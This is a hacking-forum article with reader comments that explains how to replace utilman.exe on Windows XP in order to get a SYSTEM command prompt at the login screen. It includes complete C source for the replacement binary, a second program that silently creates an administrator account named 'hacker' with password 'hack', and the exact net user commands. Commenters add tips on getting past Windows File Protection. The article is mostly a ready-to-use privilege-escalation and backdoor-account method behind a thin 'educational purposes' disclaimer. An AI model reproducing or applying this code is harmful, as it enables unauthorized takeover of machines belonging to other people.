Follow us on Twitter!
Hacking isn't just Computers & Exploits. It's a Philosophy. - Mr_Cheese
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 15
Guests Online: 12
Members Online: 3

Registered Members: 82876
Newest Member: bhl1986
Latest Articles

Create an Admin account through utilman.exe on Windows XP

Arrow Image A user can create an Administrator account on a local machine by replacing the utilman.exe file.



Disclaimer: This article is used for educational purposes only. I take no responsibility in any actions that result from you misusing the information you learn by reading this. The code you see in this article is not my own. This article is intended to only show the steps on how to use this code to gain Administrator access.

*********************************************

Alright, so there are many ways to gain Administrator access on a local machine but this one has not been mentioned yet. Not only will you get Administrator access but you will get a whole new account!

To start out we will be replacing the utilman.exe file. Now what is utilman.exe anyways?? Utilman is the Windows Utility manager giving you access to useful UI settings within Windows such as the Windows Magnifier and Narrator. It gets loaded when Windows boots up. Very nice for what we want to accomplish.

Now that we know what it is how do we use it to gain Admin access?? Well first we need to do some coding. Here is the code that you need to compile in some c/c++ compiler. I used Borland 5.5. Nice, quick, free, and easy compiler to use.

#include <stdio.h>
#include <windows.h>
#include <tchar.h>

void _tmain(void)

{

STARTUPINFO s;
PROCESS_INFORMATION p;
LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));

ZeroMemory(&s, sizeof(s));
s.cb = sizeof(s);
s.lpDesktop = szDesktop;
ZeroMemory(&p, sizeof(p));

CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);

CloseHandle(p.hProcess);
CloseHandle(p.hThread);

}

Copy and paste this code into a text file and name it "utilman.c". Compile the code and now you have a file called utilman.exe. Now the most important part is you have to have access to C:\Windows\System32 folder on the local machine. If you do then you're in great condition. If you don't have access then read other articles on here about how to gain access to unprivileged directories.

Now that we have access to the directory we want to rename utilman.exe in the \System32 folder to something like "utilman.exe.bak". Always very important to backup your files! Now take your compiled copy of utilman.exe and place it into the \System32 directory. Restart your computer now.

After your computer reboots you will be brought to the login prompt screen. If you don't have the classic login prompt active then holding in ctrl +alt and pushing the delete key twice will bring you to it. Now use this key combination to bring up a command prompt. Press Windows key + U. If you have done everything correctly up to this point then you will be looking at a command prompt running as system. Now as system we can add accounts to the local machine. Type the following into the prompt:

net user "username you want" "password you want" /add

Ex. net user aVoid hacker /add

now press enter

Now our account is created and we need to add it to the Administrator group. Enter this command to do that:

net localgroup administrators "username you specified earlier" /add

Ex. net localgroup administrators aVoid /add

now press enter

Now we have an Administrator account!! Minimize or exit out of the command prompt and enter your username and password you specified earlier and login to Windows.

Congratulations you have access to the local machine as Administrator!! Now we need to go back to the \System32 folder and rename the backup copy of Utilman back to Utilman.exe

Ex. "Utilman.exe.bak" back to "Utilman.exe"

Note: If you get a Windows access error you need to open up task manager and kill the Utilman.exe process.


*********************************************

Now if you don't want to type all that out in the command prompt then compile this C code instead of the previous one.


#include <stdio.h>
#include <windows.h>

int main(int argc, char* argv[])

{

system("net user hacker hack /add");
system("net localgroup administrators hacker /add");

return 0;

}

Note: You may receive warnings about the params of argv and argc depending on the compiler you use when compiling this code. Just ignore them.

After you compile this code follow the same steps as before. When you get to the login prompt you need to switch to the classic prompt and use the Windows key + U key sequence. You will not see a command prompt this time!! Now simply login with your specified username and password that you set in the code. If you didn't set any then the defaults will be username:hacker / password:hack Remember to restore the backup of utilman.exe!!

Hope you enjoyed this article! Sorry, it's so lengthy but I tried to write it so even the most novice computer users will be able to understand it.

Happy Hacking!
aVoid

Comments

adlezon December 15 2006 - 19:25:48
It's ok except, it's a bit sk1ddy. I mean, could you explain what the c program is doing. I'm assuming it runs cmd as a process or something when the comp starts up. But, I dunno, so I'll give you a chance to explain it, then I'll rate it.Wink
sillywillyon December 15 2006 - 23:10:06
Very nice and easy to read!! Will be trying this soon! TY
korgon December 16 2006 - 00:58:58
Already have this but your missing some things, Looks real familiar http://didierstev. . .g/hacking/.Search the site it gives more examples.
Neuromanceron January 11 2007 - 01:27:51
this thing doesn't work. seriously, I've been f$%/ing with it all night. so, the problem lies in the SFC (the Windoze file checking library). it prevents you to alter utilman.exe and make the cmd. try it, the bastard pops up all over again. so, as I've been googling and reading about this for the past couple of hours or so, here's a working page that describes how to get past the SFC. very interesting stuff. http://www.bitsum. . .outwfp.asp didierstevens is a nice blog, but the explanation is not very complete - it tells you 'how' but it doesn't tell you 'why'. so, to get this hack done (and understand it), you'll need the blog provided in comments and the site that i gave. happy hacking. N
Neuromanceron January 11 2007 - 13:55:45
yep, done it today. works. thanks for the article. :happy:
revolt0163on March 08 2007 - 11:40:48
or you could just try using at, in the command prompt
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.